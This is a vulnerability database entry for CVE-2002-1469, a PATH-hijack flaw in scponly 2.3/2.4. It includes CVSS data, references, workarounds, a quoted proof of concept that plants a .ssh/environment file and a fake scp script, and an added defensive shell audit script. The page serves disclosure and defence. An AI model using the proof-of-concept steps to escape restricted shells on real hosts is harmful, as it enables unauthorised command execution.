CVE-2002-1469
CVSS7.5
Published: 2003-04-22 00:00:00
Last revised: 2008-09-05 16:30:40

[Original] scponly does not properly verify the path when finding the (1) scp or (2) sftp-server programs, which could allow remote authenticated users to bypass access controls by uploading malicious programs and modifying the PATH variable in $HOME/.ssh/environment to locate those programs.


[CNNVD] scponly incorrect execution path handling vulnerability (CNNVD-200304-123)

scponly is a replacement login shell that lets accounts perform scp and sftp operations without being given shell access.
scponly does not properly verify the path of the scp and sftp programs when executing them; a remote attacker who is able to upload files can exploit this to execute arbitrary commands.
scponly does not verify the actual path of the scp and sftp executables before running them, and invokes them through the unsafe system() call. If the server administrator has not restricted access to the user's .ssh directory, the attacker can upload a file to $HOME/.ssh/environment to alter the user's environment and place a program named scp or sftp of their own; when this SSH user next invokes scp or sftp, the malicious code in the forged scp or sftp file executes with the privileges of the user's process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:scponly:scponly:2.3
cpe:/a:scponly:scponly:2.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1469
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1469
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-123
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5526
(VENDOR_ADVISORY)  BID  5526
http://www.iss.net/security_center/static/9913.php
(VENDOR_ADVISORY)  XF  scponly-ssh-env-upload(9913)
http://online.securityfocus.com/archive/1/288245
(VENDOR_ADVISORY)  BUGTRAQ  20020820 vulnerabilities in scponly
http://www.sublimation.org/scponly/
(UNKNOWN)  CONFIRM  http://www.sublimation.org/scponly/

- Vulnerability information

scponly incorrect execution path handling vulnerability
High severity, configuration error
2003-04-22 00:00:00 2005-05-13 00:00:00
Local

- Advisories and patches

Workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Restrict the user's environment; for example, the administrator can make the user's HOME directory non-writable.
* Modify the code to check the correct path and execute the program with execv(). "Derek D. Martin" <ddm@pizzashack.org> provides the following third-party program:

http://www.pizzashack.org/rssh/

Vendor patch:
scponly
-------
The vendor has not yet released a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:

http://www.sublimation.org/scponly/

- Vulnerability information (21732)

SCPOnly 2.3/2.4 SSH Environment Shell Escaping Vulnerability (EDBID:21732)
linux local
2002-08-20 Verified
0 Derek D. Martin
source: http://www.securityfocus.com/bid/5526/info

scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems.

The default installation of scponly does not place sufficient access controls on the .ssh subdirectory. Due to this oversight, it is possible for a remote user to upload files which may allow command execution. This could lead to unintended command execution, and regular shell access to a vulnerable host.

For example, the user could scp the following to
$HOME/.ssh/environment:

# ssh environment
PATH=/home/myhomedir/:/usr/bin:/bin
#end

Subsequently, the user could upload the following file to their home
directory, and call it scp:

#!/bin/sh

echo "I'm a bad boy" > /tmp/exploit
/usr/bin/scp $@

# end

When they next scp a file:

[root@restricted /tmp]
# ls -l
total 24
-rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit
[root@restricted /tmp]
# cat exploit
I'm a bad boy

- Vulnerability information

9564
scponly SSH Path Environment Subversion Privilege Escalation

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-08-19 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

SCPOnly SSH Environment Shell Escaping Vulnerability
Configuration Error 5526
No Yes
2002-08-20 12:00:00 2009-07-11 03:56:00
Vulnerability discovery credited to Derek D. Martin <ddm@pizzashack.org>.

- Affected program versions

scponly scponly 2.4
scponly scponly 2.3

- Solution

The vendor has provided the following fix information:

Each user with scponly as his or her shell must have an immutable home directory and .ssh subdirectory to prevent a user from using ssh config parameters to undermine the shell.
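The vendor's fix and the CNNVD workaround both reduce to one property: an scponly account must be unable to modify its home directory or its .ssh subdirectory, so that it cannot plant an environment file that redirects PATH. The following POSIX shell script is an added defender-side audit for exactly that property; it is example code written for this page, not part of scponly or of the advisory. It assumes a passwd-format input file (seven colon-separated fields), `ls -ld` output with the permission string in field 1 and the owner in field 3, an scponly install path of /usr/local/bin/scponly, and, on Linux, an optional `lsattr` for the immutable attribute the vendor fix asks for. The fixture it builds is constructed sample data.

```shell
#!/bin/sh
# Added audit example for CVE-2002-1469; not part of scponly or the advisory.
# Rule checked, from the vendor fix: an scponly account must not be able to
# modify $HOME or $HOME/.ssh. It can if either is world- or group-writable,
# or if the account owns it (an owner can chmod it back) and it is not
# immutable. An existing $HOME/.ssh/environment is reported as well.

# Permission string (field 1) and owner (field 3) of a path, via ls -ld.
perms_of() { set -- $(ls -ld "$1"); printf '%s\n' "$1"; }
owner_of() { set -- $(ls -ld "$1"); printf '%s\n' "$3"; }

# True when lsattr is available and reports the immutable ('i') flag on $1.
# Linux-only extension; elsewhere the directory is treated as mutable.
is_immutable() {
  command -v lsattr >/dev/null 2>&1 || return 1
  lsattr -d "$1" 2>/dev/null | cut -d' ' -f1 | grep -q i
}

# Print why account $2 could modify directory $1, or nothing if it cannot.
# Always exits 0 so it is safe to call under set -e.
modify_reason() {
  dir=$1; user=$2
  perms=$(perms_of "$dir"); owner=$(owner_of "$dir")
  case $perms in ????????w*) echo "world-writable ($perms)"; return 0 ;; esac
  case $perms in ?????w*) echo "group-writable ($perms)"; return 0 ;; esac
  if [ "$owner" = "$user" ] && ! is_immutable "$dir"; then
    echo "owned by the account and not immutable"
  fi
  return 0
}

# Audit every account in passwd-format file $1 whose login shell is $2.
# Prints one "FINDING user: detail" line per problem; always exits 0.
audit_scponly_homes() {
  while IFS=: read -r user pw uid gid gecos home ushell; do
    [ "$ushell" = "$2" ] || continue
    for d in "$home" "$home/.ssh"; do
      if [ ! -d "$d" ]; then
        printf 'FINDING %s: %s missing\n' "$user" "$d"
        continue
      fi
      reason=$(modify_reason "$d" "$user")
      [ -z "$reason" ] || printf 'FINDING %s: %s is %s\n' "$user" "$d" "$reason"
    done
    # An uploaded environment file is how PATH gets redirected in this bug.
    [ ! -e "$home/.ssh/environment" ] ||
      printf 'FINDING %s: %s/.ssh/environment present\n' "$user" "$home"
  done < "$1"
}

# Number of findings for passwd file $1 and shell $2 (0 when clean).
count_findings() {
  audit_scponly_homes "$1" "$2" | grep -c '^FINDING' || true
}

# Constructed fixture: three scponly accounts under a temp root. Account
# names are chosen relative to whoever runs this, so that "bad" owns its
# home while "scpgood" and "scpgrp" homes are owned by another user (the
# stand-in for a root-owned home).
make_fixture() {
  root=$(mktemp -d)
  me=$(owner_of "$root")              # the running user, as ls prints it
  shell=/usr/local/bin/scponly        # assumed scponly install path
  mkdir -p "$root/good/.ssh" "$root/bad/.ssh" "$root/grp/.ssh"
  chmod 755 "$root/good" "$root/good/.ssh" "$root/bad" "$root/bad/.ssh" "$root/grp/.ssh"
  chmod 775 "$root/grp"
  # The upload described in the advisory: PATH starting with a writable dir.
  printf 'PATH=%s:/usr/bin:/bin\n' "$root/bad" > "$root/bad/.ssh/environment"
  {
    printf 'scpgood:x:1001:1001::%s/good:%s\n' "$root" "$shell"  # not owner, 755: clean
    printf '%s:x:1002:1002::%s/bad:%s\n' "$me" "$root" "$shell"   # owns its home: flagged
    printf 'scpgrp:x:1003:1003::%s/grp:%s\n' "$root" "$shell"    # group-writable home
    printf 'alice:x:1004:1004::%s/alice:/bin/sh\n' "$root"       # other shell: ignored
  } > "$root/passwd"
  printf '%s\n' "$root"
}

# Stand-alone run: build the fixture, audit it, print findings, clean up.
demo_root=$(make_fixture)
audit_scponly_homes "$demo_root/passwd" /usr/local/bin/scponly
rm -rf "$demo_root"
```

Against a real host, replace the fixture with `audit_scponly_homes /etc/passwd "$(command -v scponly)"`. On OpenSSH 3.5 and later, sshd ignores ~/.ssh/environment unless sshd_config sets PermitUserEnvironment yes (the default is no), which closes the upload path this advisory describes even where the directory checks fail; the script does not read sshd_config, so check that setting separately.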

- Related references